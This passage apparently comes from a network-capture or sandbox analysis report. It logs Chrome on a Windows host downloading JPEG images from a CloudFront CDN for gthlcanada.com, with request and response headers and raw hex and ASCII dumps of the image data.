                                                                                                                          2025-01-13 21:01:21 UTC12792INData Raw: 7b 4f 73 85 4a 13 d5 3c fd 56 9b 31 29 b6 51 c7 bd 27 71 63 11 ae 09 55 11 25 48 8c 03 67 61 3b 83 94 9f 7e 10 aa 94 94 3e 81 c5 3a 2f 35 f8 32 ad 16 aa 5b 45 31 c9 36 97 31 6c 8d 92 36 28 d3 45 4c 3e 73 b2 66 47 17 d6 6a 52 17 3f 53 c8 53 72 56 0e 43 86 66 d4 0d 8d 73 4d 3a 9f 52 71 b9 58 2c b0 5a 2e d0 2f 7a 0c fb 3d de 5e be 15 6f 6b 17 2d 28 43 a8 ce 14 6b 2d 4c 08 c9 78 44 26 77 2c 03 8c 88 64 9f 9e 9e c6 50 67 3f a2 a4 85 6a ea 1e 55 f7 b7 44 c2 a3 d6 63 19 45 e7 34 c5 19 2a b9 6c 94 a2 db 80 c7 3d 6e 6e 6e 71 7b 77 8b d5 72 85 e3 e3 13 38 e7 c4 9b 3d 4e d8 e2 b4 c0 20 f8 50 4d 12 d2 9f cf 39 8c 69 ad 8e d6 c1 68 ee 33 d4 79 a3 0f 64 9a d3 71 e8 bd 2c 17 12 9c 23 e6 27 67 b8 7a 86 8b bb 52 5a cb a5 4e a9 63 ea 38 db d4 46 0b 47 ab 1a 17 aa ad 10 95
                                                                                                                          Data Ascii: {OsJ<V1)Q'qcU%Hga;~>:/52[E161l6(EL>sfGjR?SSrVCfsM:RqX,Z./z=^ok-(Ck-LxD&w,dPg?jUDcE4*l=nnnq{wr8=N PM9ih3ydq,#'gzRZNc8FG
                                                                                                                          2025-01-13 21:01:21 UTC4616INData Raw: bf c3 7e d1 e3 c6 1a 38 6b b0 5a 2d b1 5c 2c b0 5e af b1 58 ae 15 8f b8 d5 38 fc 91 50 ed 6a 7e 4f c2 e5 9b a2 cb 5a 6c c6 55 67 57 be 6f e2 f7 1b 63 33 87 ee a3 0f 3f c6 d7 5f 7f 8d 2f bf fc 02 af 3e f8 30 53 24 ac 31 08 c2 75 3e 00 af fd a4 9e 95 ea f2 30 8b 76 34 3a 9d e9 20 1c 27 1a e7 e7 8f 64 7c ea 65 fd 85 c2 27 9e 5c 9b ba 11 cd 4f a4 29 87 6f 2c 90 42 25 8a 8d 2e 0d 40 d7 f5 18 c6 41 e8 40 16 21 45 82 0b 2a 55 a9 e1 b9 51 75 73 e2 74 27 45 b6 6e 28 92 4f 7b c3 b1 66 aa 10 5f 3f 7a e1 9e 1b 39 80 52 8c b2 89 0e 38 46 10 a9 99 a9 42 fa 08 31 81 d2 23 f8 28 90 b6 66 c0 98 05 a0 a9 11 90 e6 49 fe dc 32 81 61 10 0c 10 98 72 c3 43 88 09 95 d4 58 4a 41 2b 2e 94 ed 55 c5 69 41 3d 7a 65 15 60 43 55 b5 ac 04 bf 39 36 9a 32 55 8c 59 73 c1 67 18 89 7a 4c a5
                                                                                                                          Data Ascii: ~8kZ-\,^X8Pj~OZlUgWoc3?_/>0S$1u>0v4: 'd|e'\O)o,B%.@A@!E*UQust'En(O{f_?z9R8FB1#(fI2arCXJA+.UiA=ze`CU962UYsgzL
                                                                                                                          2025-01-13 21:01:21 UTC12792INData Raw: e8 46 93 7f d2 2d 17 9e a8 cd 56 69 31 9a 1d d1 6f f8 41 3e fe c3 5b 99 4e f1 6b 8b 02 8d df 94 00 23 93 2b d6 64 03 68 0c 15 6a 55 16 e9 14 a4 22 1d a0 75 72 58 c8 ce 49 73 54 a2 62 cd 06 95 1e 37 27 6d a4 2c 14 23 89 ab 47 60 8c c1 17 4b ba 8a f6 70 00 6a 41 2d ee 99 56 8f 4a 78 a7 a3 c4 51 10 fb 54 2c 64 3b 30 75 d8 36 c0 a6 e2 21 2b b7 1a e5 55 98 38 cd 2c 7e e9 95 28 95 4c 85 f0 15 f4 bc f6 d3 d2 54 e6 0a f5 ce ce 01 71 d6 31 0d ae 51 62 de c8 4b 69 ac 10 d5 e7 d6 a0 10 51 55 93 54 45 2d e9 06 a0 a5 08 34 f6 94 b2 6e 48 f1 ba b8 c5 b9 9a c4 48 3d 3e 4a f6 96 b3 7c f0 c9 fa 27 2c 97 4b f8 10 85 ce e3 38 48 c8 da 2c f5 bc a2 64 64 10 20 4d 37 8d d0 0d 4c ec 2e 12 df 58 a3 7c 26 4d a6 14 2a 9e 9c 8e c6 d1 2b 51 65 c8 cf 5b 1c 92 16 b7 91 34 c5 8c 3a a9
                                                                                                                          Data Ascii: F-Vi1oA>[Nk#+dhjU"urXIsTb7'm,#G`KpjA-VJxQT,d;0u6!+U8,~(LTq1QbKiQUTE-4nHH=>J|',K8H,dd M7L.X|&M*+Qe[4:
                                                                                                                          2025-01-13 21:01:21 UTC4616INData Raw: dc 7a 1b 55 e5 c3 73 90 84 6c 91 ee 47 45 88 09 71 68 37 44 e8 4b 9c 81 28 e9 15 c1 51 87 e2 27 e4 5a 79 9b d9 34 39 e9 0c 56 92 28 db 75 23 bd 9d 6f 70 42 61 d9 76 10 dc ec 86 80 84 ae 16 cd 94 b0 b9 8e 0e 65 08 9e dc 3c 94 04 27 62 d0 b3 64 18 a1 31 27 91 5a dd 6f 0a 59 36 c4 f1 02 4f a6 1a be 06 a0 08 b9 27 03 70 2e 44 b2 c9 0d aa f8 05 7c b3 91 38 16 c4 49 56 c1 bd 09 57 98 90 05 1d 03 02 4d d3 07 15 89 93 48 75 35 69 28 c0 0b 0a 9f db b9 32 dc 29 da 17 96 09 d0 1d f4 4a 88 de 9d 03 0c 02 2a 8c d6 c2 92 c5 f9 f9 09 ae af 2f 71 7e 76 8a 17 cf 9f e3 e8 fe 03 3c 7a fc 04 fb 07 07 7e 14 13 1c 0d 98 1d 14 b4 47 02 1b 6f 3f e6 39 a7 ae 34 ef a4 db 46 d6 b1 26 a2 74 b0 42 07 95 bc e7 eb 43 33 81 6a 83 6a bc 8d d9 7c 81 d5 b2 09 f1 aa 2a 29 99 6c b0 fe 23 21
                                                                                                                          Data Ascii: zUslGEqh7DK(Q'Zy49V(u#opBave<'bd1'ZoY6O'p.D|8IVWMHu5i(2)J*/q~v<z~Go?94F&tBC3jj|*)l#!
                                                                                                                          2025-01-13 21:01:21 UTC1730INData Raw: 14 82 99 9b 4f 79 8f 0b 71 72 b7 e0 95 97 ac eb c5 b7 f7 f7 43 8e 0a e7 e4 46 10 29 30 03 a1 ca c5 cf e1 d0 88 23 72 3a 3b 56 64 ce b1 38 c0 18 d6 3a ef 0c a1 aa f4 3b e7 b5 15 85 60 1d 65 bc 1c df 26 eb 42 12 c9 b2 b9 68 e4 2e dd 71 c0 e8 2e 0f 7b 05 3f 9e b9 f0 16 e6 0e 69 b5 74 1d 19 c6 5a e3 ef 42 61 24 1a a7 0a 05 d7 18 32 71 b3 e4 f9 82 d1 09 85 e1 20 2a 02 9c 2d 78 72 79 3d 12 7a 8a 57 4e 02 33 19 f1 2c c3 3a 29 3b 70 48 db be 6e ba a4 f4 c5 8e b5 3b 53 a1 e8 e7 f8 1e a4 eb 4b 74 75 90 66 31 5f 34 fd e2 92 4f da 45 e0 8a 06 2b f3 c2 a5 5b 8d 63 46 ad 3c 22 d6 ae 9a f0 fc 28 4d 5c 62 b1 69 1d 77 e2 d7 b9 07 42 50 a7 3a 2b 52 63 69 40 48 c6 1d 3a cf e0 af 4e b9 f0 ef d1 e0 62 d2 a2 2a d6 24 02 cd c9 85 c4 c9 6c ea e0 bc fb 46 48 3f 76 31 48 a9 43 fd
                                                                                                                          Data Ascii: OyqrCF)0#r:;Vd8:;`e&Bh.q.{?itZBa$2q *-xry=zWN3,:);pHn;SKtuf1_4OE+[cF<"(M\biwBP:+Rci@H:Nb*$lFH?v1HC
                                                                                                                          2025-01-13 21:01:21 UTC9000INData Raw: 85 5a fb 8f fb 9f 90 8f d0 1f 23 e2 bc f5 db ae 29 89 fc ef b8 b7 b7 e7 df e3 db 77 78 fc e4 31 4c 58 4b 3a f8 64 a7 91 6c 2f a7 f9 16 d2 00 b3 0f b1 61 c6 aa 59 a1 36 35 4c e5 91 a9 12 d9 f7 87 ba f7 d8 6e 31 9f cd a1 37 3d 07 2e bf 37 61 01 46 7d 3e a8 6f d8 5c f1 39 9c 28 38 65 44 6e 17 35 fd 9c 17 44 d9 93 f6 46 0f 83 bf ff 50 81 18 2f c8 dc a0 66 17 17 67 7d 1c 6f 6b 19 5a 5b b1 e6 b9 b0 58 66 e9 95 5d a4 e3 75 e8 20 c5 f5 de 61 9a 74 c2 7d f2 a4 a0 f4 db 48 e6 05 02 ad f6 59 73 65 a1 7a bb ca a0 3c ac 23 a0 90 84 8c 81 36 c1 4e a5 62 3b 17 07 b1 10 8d 16 91 de 92 55 b1 4a a3 77 20 4f 46 14 bc 9b 43 91 6a da e1 8e e7 e4 c4 cc 3b ed 22 59 c4 52 ae 49 65 23 47 83 da d0 12 c1 75 89 b0 36 f4 16 32 da b4 ce 76 9f a5 85 a0 f0 a7 2e 3b a9 f0 2e 4a 97 02 7f
                                                                                                                          Data Ascii: Z#)wx1LXK:dl/aY65Ln17=.7aF}>o\9(8eDn5DFP/fg}okZ[Xf]u at}HYsez<#6Nb;UJw OFCj;"YRIe#Gu62v.;.J
                                                                                                                          2025-01-13 21:01:21 UTC8408INData Raw: 95 d6 f8 db bf f9 1b b8 16 b8 7f ef 3e 9e 3c 7d 04 a5 81 bf f8 27 7f 8e bd 3b fb 70 cc 58 ae 5a 5c 5c 5c e1 fc ea 1a 46 d7 98 2d 67 b8 b9 b9 f6 dc b7 aa 86 32 1a 3a a4 41 f9 82 7c e6 1d 5c da 06 ab 66 e9 0d 04 1b 0b a3 0c 6a 6d 70 78 74 84 d1 64 82 d1 64 0c b0 f5 e9 66 e1 e5 69 65 82 68 24 6c 48 ee b5 bb 59 59 7c 6b ef bc 86 a3 bb 8e 3b 45 25 6f 0b b2 50 09 97 4b 8c aa 77 ce 13 dd ef de 3d c4 ee f6 36 de bc 7b 8b eb 9b 6b 1c 1e de c5 78 34 f2 28 69 b0 ad 72 61 0a 10 c3 23 72 7a 5d f8 7e ba 53 98 ac e1 d9 91 88 4f 96 a9 6c c9 7f 18 65 d1 9d 0c eb 03 22 a2 c8 07 5c 90 ca d3 07 9f 9c ea 30 d2 1a 7f fa a7 3f c2 aa 69 c0 e4 50 55 06 93 f1 24 23 59 91 7b 2e fc 69 91 0a 28 35 7c 0c c4 ce 3f 45 b5 67 14 3f 22 78 4a 94 40 cc 0a e3 d1 d4 53 b0 38 37 b8 ce 5a 2c 57
                                                                                                                          Data Ascii: ><}';pXZ\\\F-g2:A|\fjmpxtddfieh$lHYY|k;E%oPKw=6{kx4(ira#rz]~SOle"\0?iPU$#Y{.i(5|?Eg?"xJ@S87Z,W


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          121192.168.11.204994754.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC445OUTGET /app/uploads/gthl/2022/10/31124110/SnacksToFuelPerformance-BreakoutFall2022-730x355.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC449INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 60211
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Mon, 31 Oct 2022 16:41:12 GMT
                                                                                                                          ETag: "7b142d0c22482e370c8144d20a1d80cf"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 62997e8047323290451b8a864e88914c.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: HnH-0G6pM8kaWs-cORdDgwV9xKaJFpzTgO8ARDnuyUGem1rGWtTAfg==
                                                                                                                          2025-01-13 21:01:21 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 39 00 39 00 00 ff e2 0f d0 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0f c0 61 70 70 6c 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e6 00 0a 00 05 00 0a 00 25 00 22 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 64 65 73 63 00 00 01 50 00 00 00 62 64 73 63 6d 00 00 01 b4 00 00 04 9c 63 70 72 74 00 00 06 50 00 00 00 23 77 74 70 74 00 00 06 74 00 00 00 14 72 58 59 5a 00 00 06 88 00 00 00 14 67 58 59 5a 00 00 06 9c 00 00 00 14 62 58 59 5a 00 00 06 b0 00 00 00 14 72
                                                                                                                          Data Ascii: JFIF99ICC_PROFILEapplmntrRGB XYZ %"acspAPPLAPPL-appldescPbdscmcprtP#wtpttrXYZgXYZbXYZr
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: b8 6e a8 a1 5e 28 71 2a 3e 37 1e 22 39 cd b1 66 e8 c7 ee 23 77 4b 49 ea cc d2 a9 13 35 19 17 26 a6 9d a5 29 2e 4b 2d 39 dc 46 e6 7c 62 ae f1 1f 9b ab 19 46 a5 ad 1d a5 be 8f af 73 fa 7e 02 ad 19 e1 14 dc ea f9 e9 5b 2e aa d6 87 58 2b 5f 7b 2d f6 ea 2b a3 27 40 26 74 6d b9 ea 5d 6e ed a2 53 29 b7 3b 4e a2 61 c6 d0 eb ed cd a9 be 00 6e fd e1 03 8c 7a 76 4d b3 4b 9a db 6a 79 ce ac 4d 4b a6 58 d5 9b 2e 23 ef d4 c2 08 5e 3b 0e 55 98 ae 9b 5b d6 43 da 58 29 3a 67 6c cf df fe 13 72 b7 bd ea ab 5e 0e c3 4f 21 bf b7 29 29 3f 6b 4a 4f 22 78 98 74 f4 2d 3e b5 e8 75 b9 9b a9 8a 3c ba 6b 53 a9 09 7e 6f 77 c7 09 dd 4a 7a b4 9e c4 0d d1 81 1e 8c 2e 16 58 8c 92 b2 59 72 bd 3d 2f f0 3e 67 18 e3 54 f8 5c b1 14 d3 9b 75 15 48 2c cd 5d 66 cb ab 5e 65 b3 df 7e 9d 4d 96 08 20
                                                                                                                          Data Ascii: n^(q*>7"9f#wKI5&).K-9F|bFs~[.X+_{-+'@&tm]nS);NanzvMKjyMKX.#^;U[CX):glr^O!))?kJO"xt->u<kS~owJz.XYr=/>gT\uH,]f^e~M
                                                                                                                          2025-01-13 21:01:21 UTC9861INData Raw: 93 5c dc ca b8 27 90 1c d4 7b 00 8e 61 57 aa cd 55 e6 95 31 32 ae 1f 78 80 78 20 79 23 f1 5e 2e f1 85 2f 0e c3 95 49 66 af 25 a2 e8 97 77 fa 2e a7 a3 0d 86 75 9d de c7 17 d6 9b 9d ea 76 b1 53 eb b2 49 5b 0d 55 e9 a6 55 c1 bc a0 54 1b 57 32 47 01 c1 51 ef 52 2a a2 50 36 dc c2 94 a5 4c 23 79 94 27 79 6a 56 39 e0 76 f0 31 a9 ed 0b 6b d6 ab 6f da f3 b4 3a cb 74 b7 65 67 54 87 a6 14 0a 88 69 40 64 24 76 a8 e3 b7 84 6d 34 9a 2b 12 72 f2 4a 95 a8 3c e9 96 18 5b ae 38 4a c9 23 8e 71 d9 e4 e5 1f c7 38 9f 13 ad c5 a8 d3 c4 62 ea 39 4d de fe 96 7d b6 5f 03 eb 52 a6 a9 b7 18 a3 6a 63 2a 97 6f 79 20 1c 0c 80 79 47 3f b8 96 d4 d5 d4 e2 44 bf 58 b6 9a 00 25 2a 39 56 3b 86 40 31 b7 a6 7f c1 ca 93 36 cb 88 08 c2 77 db 49 e3 dc 71 c4 1f 3c 78 55 9a 43 15 59 a7 2a 52 b4 44
                                                                                                                          Data Ascii: \'{aWU12xx y#^./If%w.uvSI[UUTW2GQR*P6L#y'yjV9v1ko:tegTi@d$vm4+rJ<[8J#q8b9M}_Rjc*oy yG?DX%*9V;@16wIq<xUCY*RD
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 9d 31 50 a9 d4 9f 44 b4 a4 ac ba 0a dc 79 d5 9c 25 29 03 99 24 c2 17 7e d8 bf ca 30 e0 ba 3f 92 95 6d 8b a5 c1 49 07 fe 1b 41 e2 3f 90 a8 86 8d 67 52 f6 48 da 2f 47 ad a3 78 ea 4e 93 d6 e8 74 54 ba 86 57 3a fb 69 2d a1 6a f5 a1 45 2a 3b b9 3c 38 e3 8c 72 18 fa 04 e9 31 4a 55 b1 5e a1 e4 03 86 a4 c8 c8 ff 00 d6 da 8f 9f b8 05 a9 21 7d 0b b7 7d 46 9d af b7 45 9a 99 85 78 05 6a dd 5c c3 8d 67 81 75 87 50 50 ac 77 84 ad 63 e1 8d 0b a5 c3 db 93 58 f7 16 99 f3 31 ed f4 39 7b 6b e6 7d ec 4f 7e 93 51 e2 f4 b8 7b 72 6b 1e e2 d3 3e 66 29 3a 8c c2 36 d9 6d 23 d5 19 db 71 37 7c 9e 9d dc 93 14 35 34 5f 15 16 a9 8f 2e 5c b6 09 05 7d 60 4e ee e8 c1 c9 ce 38 46 a5 1f 41 bb 05 b6 db fb 0c e9 fb 0f 21 2e 36 ba 14 d2 54 85 0c 85 02 f3 d9 04 76 88 85 3e 7c a3 b6 ec 57 7d 54
                                                                                                                          Data Ascii: 1PDy%)$~0?mIA?gRH/GxNtTW:i-jE*;<8r1JU^!}}FExj\guPPwcX19{k}O~Q{rk>f):6m#q7|54_.\}`N8FA!.6Tv>|W}T
                                                                                                                          2025-01-13 21:01:21 UTC2754INData Raw: 10 04 34 ad 9e 75 0e fa 91 be ab 5a 6d 74 56 e6 2a 0d b3 2d 36 94 97 9d 2e 16 5f 67 39 29 59 e3 83 83 c3 cd 1a 96 87 6a c5 e2 9d 5e a4 49 57 ae aa 94 ec 84 ec cb 92 6b 66 62 65 4b 46 56 08 49 c1 38 e0 ac 47 9d 71 3a 6f 26 8f da 76 f7 58 fa d3 f0 4e 2a 0f 11 6a 91 7c a8 a9 e9 7f 69 34 de 9d b6 ea 3e 3c 88 33 0d 82 91 76 dd 0b da da 6a dc 72 e0 9f 55 2d 33 0e a4 49 97 d5 d4 81 d4 64 0d de 5c f8 c2 4d af af cb 92 85 74 50 a8 d6 e5 7a 7a 9f 89 25 be f0 95 7d 4d ef 95 2f 09 ce 0f 1c 04 9f 4c 6e 78 f8 c6 94 aa db ca ec 79 a8 78 56 bd 7c 75 0c 0a 9a bd 58 29 df 5b 24 d3 76 7f 21 d5 41 91 cf 31 c5 76 58 bb aa 57 26 96 bf 33 5a a8 cc 4f 4d c8 4e be da dd 7d c2 b5 94 e0 2c 02 4f 1e 46 38 35 1e a1 ac 5b 40 5f 95 59 4a 2d e2 fc 80 96 0e 3e 96 8c db 8c b2 cb 41 7b a9
                                                                                                                          Data Ascii: 4uZmtV*-6._g9)Yj^IWkfbeKFVI8Gq:o&vXN*j|i4><3vjrU-3Id\MtPzz%}M/LnxyxV|uX)[$v!A1vXW&3ZOMN},OF85[@_YJ->A{
                                                                                                                          2025-01-13 21:01:21 UTC6636INData Raw: 70 27 b0 f0 3f 01 8d 63 4f ed ef aa 1d 34 d4 d6 d2 8d e7 64 11 2b 3e df 0e d6 dc 59 3f ee ef 47 c9 ab 96 bc 21 91 59 fb 5f 34 93 3f 7f 80 95 5e 19 5f 11 f6 8a 9c c8 35 45 26 d2 5e c4 9b 8a 4e dd 93 37 cb 46 7d 9a ae d7 9e a9 cb a8 29 b9 b2 a7 d0 47 68 54 a8 3f ae 31 6b 04 97 d5 d6 d3 5f 53 e0 6f a2 5a 4b a9 c7 e4 cb ad c3 f1 91 1a 86 cd 93 af 54 35 be 83 31 30 ac ac 32 e3 79 ef 08 60 a4 7c 40 46 d3 69 5d 96 db 3b 4f dc 77 45 d3 56 96 91 92 65 d9 d6 9b 75 e5 61 25 40 06 92 07 97 19 8d d3 9c 6a d2 49 ed 2a 87 9f 17 85 a9 81 e2 13 95 34 dc a9 61 6c ad bd ee d2 36 2d 8c 6a 64 51 af 0a 12 95 c5 a2 dc c8 1e 74 29 27 f4 44 78 bb 1b 7b 24 5c 9f d0 55 f3 c2 13 ec bb 52 96 92 d5 6b aa 95 2b 30 87 25 a7 a4 66 fa 95 a0 f8 ab 08 73 29 23 fa a4 98 51 b1 bf b2 45 c9 fd
                                                                                                                          Data Ascii: p'?cO4d+>Y?G!Y_4?^_5E&^N7F})GhT?1k_SoZKT5102y`|@Fi];OwEVeua%@jI*4al6-jdQt)'Dx{$\URk+0%fs)#QE


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          122192.168.11.204994854.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC687OUTGET /app/uploads/gthl/2020/04/09100946/82137226_2705410846193604_1955700155504132096_o-730x435.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC449INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 66915
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Thu, 09 Apr 2020 14:09:48 GMT
                                                                                                                          ETag: "db45c9184f115fab5f8c1916bb5a0fea"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 1717f995f2ca7c5df4d0a972f90c1564.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: m5RJVfTA9KeQoZRGtmzr9v_5bM35HZVbFSlitnXvfSD3BjI3RPeD7A==
                                                                                                                          2025-01-13 21:01:21 UTC15935INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 18 79 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 03 c0 00 00 01 01 00 03 00 00 00 01 02 80 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1c 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d0 87 69 00 04 00 00 00 01 00 00 00 e4 00 00 01 1c 00 08 00 08 00 08 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 35 20 57 69 6e 64 6f 77 73 00 32 30 32 30 3a 30 34 3a 30 39 20 31 30 3a 31 36 3a
                                                                                                                          Data Ascii: JFIFHHyExifMM*(12iHHAdobe Photoshop CS5 Windows2020:04:09 10:16:
                                                                                                                          2025-01-13 21:01:21 UTC1094INData Raw: de d7 b7 a2 26 cc 49 b8 b1 d7 9a 31 37 31 37 e6 77 dd 5d 26 f7 01 bd c7 86 e8 6f b1 f8 89 69 68 3a 6f 64 62 3b f7 09 bb 40 d3 e4 ae 89 93 6a 15 86 26 64 83 ae 3c ba 2a b1 63 19 00 04 5a c1 19 99 37 7c f6 35 cd 69 23 88 58 db 98 56 18 b6 bd c1 49 53 25 25 4b a4 85 c5 af 02 c0 f9 85 d6 7c 3c b4 d7 59 b4 3c bd 56 5e 89 0b 48 6e c7 55 52 3c b6 da 5d 22 ca ec 75 ff 00 c5 7b 97 ae 9e 1f 99 e5 cf fd 7b 34 4c c2 fe 3c 76 b9 c3 5b ce ef cd 6d e6 a8 a2 d2 26 eb b0 5c ae fa 98 bf 53 9d 34 bf 8a c3 ac 0b 4e 83 e4 8a 7d 08 58 77 35 af b6 a8 68 e3 d4 03 a1 45 88 38 1d 14 6b a4 e0 38 79 22 c4 68 5b 6f b2 29 c0 ba 8d 17 06 f6 17 3d 11 08 12 02 ad 44 9b 50 6e 9b 4d 49 ef a1 53 fe 5a 98 9d 76 38 07 d1 37 0b 11 3f 27 b1 03 75 99 da cc c4 47 93 b6 e4 69 aa 77 22 f1 f2 91 b4
                                                                                                                          Data Ascii: &I1717w]&oih:odb;@j&d<*cZ7|5i#XVIS%%K|<Y<V^HnUR<]"u{{4L<v[m&\S4N}Xw5hE8k8y"h[o)=DPnMISZv87?'uGiw"
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: e0 9f 08 24 ca 38 f8 d7 f6 55 4f c9 3e 8d d7 fb 8e 19 ed b4 67 2c e3 4c b1 76 19 55 6f c0 54 fa 17 6e 39 b8 7f d9 11 c1 f1 18 41 e3 a0 aa 17 e9 19 52 71 5a 1d 23 95 86 7f c9 13 e8 6b 1a 35 a3 9c 72 ff 00 0c e8 a7 d3 b3 5f 75 8b 5f ba 33 05 46 b7 a7 98 79 b0 ab f4 e5 23 91 49 ff 00 20 06 4c 3e e4 80 73 f7 4a 7d 39 74 8c d5 ff 00 1b 40 1f c4 2f c4 d7 0f 44 fa 72 9f 53 f9 83 c9 55 24 ad 8d af 71 22 36 f0 b7 c0 2b 35 b3 9c 5e 91 ee 0e 30 1b ae eb 3d 36 6a 32 c4 f8 92 e3 00 9b 59 3a 6c 4d ff 00 90 39 e6 f7 bf 82 ba 84 df f2 26 ca e6 3d ae 69 b1 04 1d 42 6a 09 ef ee 79 ea 1d 51 2b e5 7b ae f7 b8 b8 e9 cd 5e cc eb 5e e8 ae 0f de 17 4e cb 13 fc 11 27 aa 76 2d e3 c1 af 71 61 75 7b 39 f5 7f 07 68 2e 1a 03 e2 9d 97 53 29 9d 33 5d 4a d8 04 2c e2 0f 2f 32 5b de 23 a2
                                                                                                                          Data Ascii: $8UO>g,LvUoTn9ARqZ#k5r_u_3Fy#I L>sJ}9t@/DrSU$q"6+5^0=6j2Y:lM9&=iBjyQ+{^^N'v-qau{9h.S)3]J,/2[#
                                                                                                                          2025-01-13 21:01:21 UTC1024INData Raw: b5 58 35 93 30 3b dd 2d 69 37 f7 51 e8 c7 5e cc 1c 5e 5d 20 9d b7 0e 76 84 8d 46 cb 32 e9 83 ce 94 f3 46 5d 63 ee 3e fd 77 ba cb bc b0 e6 64 80 0e 2d 40 16 04 74 46 52 d2 0e ea 56 1e 2b 91 ce fb 22 b3 9a f6 38 dc b6 c3 9f 82 89 12 c9 07 fb 93 be 2d b9 95 18 ba 48 5f de 30 00 07 42 4a af 2e 49 35 4b 5a e6 f0 bc 35 d1 9d 1c 0f 3f 0b 74 53 6c 46 ad 3d 16 87 3a c7 e0 c1 c6 20 32 fd 33 0c 12 b6 10 e8 dc e3 70 41 be 83 fa 24 d3 7d df 27 91 14 8c 9f 4b 4a dc 0b 2e d0 e5 bc 41 f5 6c c4 1f 53 34 60 b4 34 34 34 03 ce e1 67 2e 7e a8 d3 8d 38 b1 86 77 12 c8 76 2f ed 0e 9a 47 58 3a c4 34 0e ab cb 35 7a a2 76 b6 a8 84 4b 86 3e 9d 92 18 e5 6d 38 20 8d f4 dc 5f 95 c5 d4 ac e9 d7 4d 62 3a 7b 90 43 46 d6 5b db 9f 4b 1e a0 3e 8a b2 2a b8 da 0c 90 bd b2 0b 8b 82 41 ba eb 4b
                                                                                                                          Data Ascii: X50;-i7Q^^] vF2F]c>wd-@tFRV+"8-H_0BJ.I5KZ5?tSlF=: 23pA$}'KJ.AlS4`444g.~8wv/GX:45zvK>m8 _Mb:{CF[K>*AK
